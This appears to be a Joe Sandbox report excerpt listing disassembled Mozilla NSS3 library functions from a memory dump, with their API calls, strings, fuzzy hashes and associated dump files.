Instruction ID: 30aa50c4a11d5fa141b8f060b600da52b5fdcb431e470c43be220ac229e319a8
Opcode Fuzzy Hash: 177919e84f8b9383db64c01296e879bb34bdc85bd7d9706ede9d7766d6899772
Instruction Fuzzy Hash: 12310432605055AFCB20DB95CF4DE6A3BB5EB4235CF046474F40D6BA12D738A858C7D1

Function 6C7CCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C7CCC7B), ref: 6C7CCD7A

Part of subcall function 6C7CCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C73C1A8,?), ref: 6C7CCE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7CCDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7CCDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C7CCDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7CCD8E

Part of subcall function 6C6F05C0: PR_EnterMonitor.NSS3 ref: 6C6F05D1
Part of subcall function 6C6F05C0: PR_ExitMonitor.NSS3 ref: 6C6F05EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C7CCDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7CCDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7CCE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7CCE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C7CCE48

Strings

wship6.dll, xrefs: 6C7CCDE3
freeaddrinfo, xrefs: 6C7CCD9F, 6C7CCE10
getaddrinfo, xrefs: 6C7CCD88, 6C7CCDF9
ws2_32.dll, xrefs: 6C7CCD75
getnameinfo, xrefs: 6C7CCDB2, 6C7CCE23

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 8265056cad68ff0583820c511447759d02fbedc505f1b4fd24083e850732d0ff
Instruction ID: 67c34fa81f452e711d4843c846a8c45f4f4704388ec8f4d924e4d10f1b8255f4
Opcode Fuzzy Hash: 8265056cad68ff0583820c511447759d02fbedc505f1b4fd24083e850732d0ff
Instruction Fuzzy Hash: 5111DDD5F025321ADB1165B63E055BA38595B0334EF147935DC19D5F02FB10C50AC6FB

Function 6C811C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C8113BC,?,?,?,6C811193), ref: 6C811C6B
PR_NewLock.NSS3(?,6C811193), ref: 6C811C7E

Part of subcall function 6C7C98D0: calloc.MOZGLUE(00000001,00000084,6C6F0936,00000001,?,6C6F102C), ref: 6C7C98E5

PR_NewCondVar.NSS3(00000000,?,6C811193), ref: 6C811C91

Part of subcall function 6C6EBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6F21BC), ref: 6C6EBB8C

PR_NewCondVar.NSS3(00000000,?,?,6C811193), ref: 6C811CA7

Part of subcall function 6C6EBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6EBBEB
Part of subcall function 6C6EBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C6EBBFB
Part of subcall function 6C6EBB80: GetLastError.KERNEL32 ref: 6C6EBC03
Part of subcall function 6C6EBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C6EBC19
Part of subcall function 6C6EBB80: free.MOZGLUE(00000000), ref: 6C6EBC22

PR_NewCondVar.NSS3(00000000,?,?,?,6C811193), ref: 6C811CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6C811193), ref: 6C811CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C811193), ref: 6C811CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6C811193), ref: 6C811D1A

Part of subcall function 6C7C9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6F1A48), ref: 6C7C9BB3
Part of subcall function 6C7C9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F1A48), ref: 6C7C9BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C811193), ref: 6C811D3D

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6C811193), ref: 6C811D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C811193), ref: 6C811D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C811193), ref: 6C811D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C811193), ref: 6C811D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6C811193), ref: 6C811D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6C811193), ref: 6C811D93
PR_DestroyLock.NSS3(00000000,?,?,6C811193), ref: 6C811D9F
free.MOZGLUE(00000000,?,6C811193), ref: 6C811DA8

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: 4468bdb1060bcd4c352beac36369694c1b6baf0e5840685d28201d6e8b5dd823
Instruction ID: cd69f1eaccf644222c2509cf156d06c6ba2fc97b4108c5f494b52fc20a12e07d
Opcode Fuzzy Hash: 4468bdb1060bcd4c352beac36369694c1b6baf0e5840685d28201d6e8b5dd823
Instruction Fuzzy Hash: 3131E6F5E007025FEB219F65AD45A677AF4AF1660DB044839E84A87F41FB31E408CBA6

Function 6C770C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,wl), ref: 6C770C81

Part of subcall function 6C75BE30: SECOID_FindOID_Util.NSS3(6C71311B,00000000,?,6C71311B,?), ref: 6C75BE44

Part of subcall function 6C748500: SECOID_GetAlgorithmTag_Util.NSS3(6C7495DC,00000000,00000000,00000000,?,6C7495DC,00000000,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C748517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C770CC4

Part of subcall function 6C75FAB0: free.MOZGLUE(?,-00000001,?,?,6C6FF673,00000000,00000000), ref: 6C75FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C770CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C770D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C770D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C770D7D
free.MOZGLUE(00000000), ref: 6C770DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C770DC1
free.MOZGLUE(00000000), ref: 6C770DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C770E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C770E0F

Part of subcall function 6C7495C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C7495E0
Part of subcall function 6C7495C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C7495F5
Part of subcall function 6C7495C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C749609
Part of subcall function 6C7495C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C74961D
Part of subcall function 6C7495C0: PK11_GetInternalSlot.NSS3 ref: 6C74970B
Part of subcall function 6C7495C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C749756
Part of subcall function 6C7495C0: PK11_GetIVLength.NSS3(?), ref: 6C749767
Part of subcall function 6C7495C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C74977E
Part of subcall function 6C7495C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C74978E

Strings

*,wl, xrefs: 6C770DCC
*,wl, xrefs: 6C770C69, 6C770DE0, 6C770C80, 6C770C8B, 6C770CAF
-$wl, xrefs: 6C770C64

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,wl$*,wl$-$wl
API String ID: 3136566230-962488925
Opcode ID: 42c54cf8603e0a86bce4476d41abac19fd68b50bb4f3267426f1007664103001
Instruction ID: b816b922590dc016f9f17d4c8602b91850cafbd3d9f20ac6edf265c1ac21a9f6
Opcode Fuzzy Hash: 42c54cf8603e0a86bce4476d41abac19fd68b50bb4f3267426f1007664103001
Instruction Fuzzy Hash: 1241C2B5900249ABEF109F65DE4ABAF7678AF0530CF104134E91557742EB36EA18CBF2

Function 6C765CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C765EC0,00000000,?,?), ref: 6C765CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C765CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C765CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C765D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C765EC0,00000000,?,?), ref: 6C765D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C765D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C765D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C765D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C765D80

Strings

extern:, xrefs: 6C765CEA, 6C765D4B
dbm:, xrefs: 6C765D03, 6C765D60
NSS_DEFAULT_DB_TYPE, xrefs: 6C765D1A
multiaccess:, xrefs: 6C765CB8
sql:, xrefs: 6C765CD1, 6C765D36

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 0656853923052c7fae27e765aae91399a76000cbac106088fdd26c00461e82c0
Instruction ID: 506782f47e47f06acbe81903d69907ddcaada5a6c49d00d6120b605a568bb298
Opcode Fuzzy Hash: 0656853923052c7fae27e765aae91399a76000cbac106088fdd26c00461e82c0
Instruction Fuzzy Hash: B03124F07013016BF7A11A26EE8AB663768AF0234CF100430ED55A6FC3E7B5D401DAD5

Function 6C766CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C831DE0,?), ref: 6C766CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C766D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C766D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C766D82
DER_GetInteger_Util.NSS3(?), ref: 6C766DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C766DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C766E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C766F19
PK11_DigestBegin.NSS3(00000000), ref: 6C766F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C766F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C767011
PK11_FreeSymKey.NSS3(00000000), ref: 6C767033
free.MOZGLUE(?), ref: 6C76703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C767060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C767087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C7670AF

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 4e75a3662afee719bbbc03ee8ce2ef46331df9e35e4a63af6c3ea9d1ea724146
Instruction ID: 15695182e0a551636965d1327cba3d7b646bb0e24c1bfa7638be84504bee2bfe
Opcode Fuzzy Hash: 4e75a3662afee719bbbc03ee8ce2ef46331df9e35e4a63af6c3ea9d1ea724146
Instruction Fuzzy Hash: 0EA13B719042009BEB009F26CF59BAB3295EB8130CF648939ED58CBF81E775DA49C793

Function 6C72AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C70AB95,00000000,?,00000000,00000000,00000000), ref: 6C72AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C70AB95,00000000,?,00000000,00000000,00000000), ref: 6C72AF39
PR_Unlock.NSS3(?,?,?,6C70AB95,00000000,?,00000000,00000000,00000000), ref: 6C72AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C70AB95,00000000,?,00000000,00000000,00000000), ref: 6C72AF69
TlsGetValue.KERNEL32 ref: 6C72B06B
EnterCriticalSection.KERNEL32(?), ref: 6C72B083
PR_Unlock.NSS3(?), ref: 6C72B0A4
TlsGetValue.KERNEL32 ref: 6C72B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C72B0D9
PR_Unlock.NSS3 ref: 6C72B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C72B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C72B182

Part of subcall function 6C75FAB0: free.MOZGLUE(?,-00000001,?,?,6C6FF673,00000000,00000000), ref: 6C75FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C72B177

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C70AB95,00000000,?,00000000,00000000,00000000), ref: 6C72B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C70AB95,00000000,?,00000000,00000000,00000000), ref: 6C72B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C70AB95,00000000,?,00000000,00000000,00000000), ref: 6C72B1C2

Part of subcall function 6C751560: TlsGetValue.KERNEL32(00000000,?,6C720844,?), ref: 6C75157A
Part of subcall function 6C751560: EnterCriticalSection.KERNEL32(?,?,?,6C720844,?), ref: 6C75158F
Part of subcall function 6C751560: PR_Unlock.NSS3(?,?,?,?,6C720844,?), ref: 6C7515B2

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: d730e3ba7042663c4c4020d41573aa444626d04a222ac204b8d17bdc139191cb
Instruction ID: c1b015cd0b0ee875651b1edf76827e26d11eb400d37ee4f13a968c28503bdb09
Opcode Fuzzy Hash: d730e3ba7042663c4c4020d41573aa444626d04a222ac204b8d17bdc139191cb
Instruction Fuzzy Hash: 09A1D0B1D00206ABEF019F64DD49AEAB7B4FF08318F144134E805A7752E739E959CBE2

Function 6C722C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?rl,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722C62
EnterCriticalSection.KERNEL32(0000001C,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722C76
PL_HashTableLookup.NSS3(00000000,?,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722C93

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23), ref: 6C722CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?), ref: 6C722CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?), ref: 6C722D4D
EnterCriticalSection.KERNEL32(?), ref: 6C722D61
PL_HashTableLookup.NSS3(?,?), ref: 6C722D71
PR_Unlock.NSS3(?), ref: 6C722D7E

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

Strings

#?rl, xrefs: 6C722C43

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?rl
API String ID: 2446853827-3858320230
Opcode ID: 81fa02d3991c16a73ad500a9470deba3c6bbbebbb25dfb94b57c1b52be787219
Instruction ID: 6bde899d170c55d1eb8b69236df32dc17ad8e1285490f1eb3fc08e67014bf11c
Opcode Fuzzy Hash: 81fa02d3991c16a73ad500a9470deba3c6bbbebbb25dfb94b57c1b52be787219
Instruction Fuzzy Hash: ED5118B6D00105ABDB109F24DD498AAB7B8FF1936CB188530EC1897B12E735ED65CBE1

Function 6C77AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C77ADB1

Part of subcall function 6C75BE30: SECOID_FindOID_Util.NSS3(6C71311B,00000000,?,6C71311B,?), ref: 6C75BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C77ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C77AE08

Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C77AE25
PL_FreeArenaPool.NSS3 ref: 6C77AE63
PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C77AE4D

Part of subcall function 6C684C70: TlsGetValue.KERNEL32(?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684C97
Part of subcall function 6C684C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CB0
Part of subcall function 6C684C70: PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C77AE93
PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C77AECC
PL_FreeArenaPool.NSS3 ref: 6C77AEDE
PL_FinishArenaPool.NSS3 ref: 6C77AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C77AEF5
PL_FinishArenaPool.NSS3 ref: 6C77AF16

Strings

security, xrefs: 6C77ADEE

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 47f78138e519e5a63728c0442528aca258328ee6e26b23ed04b45b6de50e89f8
Instruction ID: f1ca5f62e63362efbbfcefc0f4f31e0a639e24252ae5fceb298aa0420b2019bb
Opcode Fuzzy Hash: 47f78138e519e5a63728c0442528aca258328ee6e26b23ed04b45b6de50e89f8
Instruction Fuzzy Hash: 664126B1904208A7FF315B159E4EBAA32ACAF5232DF541635E81492F41FB75D60886F3

Function 6C81AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7C9890: TlsGetValue.KERNEL32(?,?,?,6C7C97EB), ref: 6C7C989E

EnterCriticalSection.KERNEL32(?), ref: 6C81AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C81AFCE
PR_SetPollableEvent.NSS3(?), ref: 6C81AFD9
EnterCriticalSection.KERNEL32(?), ref: 6C81AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C81B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C81B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C81B070
PR_JoinThread.NSS3(?), ref: 6C81B07B
free.MOZGLUE(?), ref: 6C81B084
EnterCriticalSection.KERNEL32(?), ref: 6C81B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C81B0C4
PR_JoinThread.NSS3(?), ref: 6C81B0F3
free.MOZGLUE(?), ref: 6C81B0FC
PR_JoinThread.NSS3(?), ref: 6C81B137
free.MOZGLUE(?), ref: 6C81B140

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
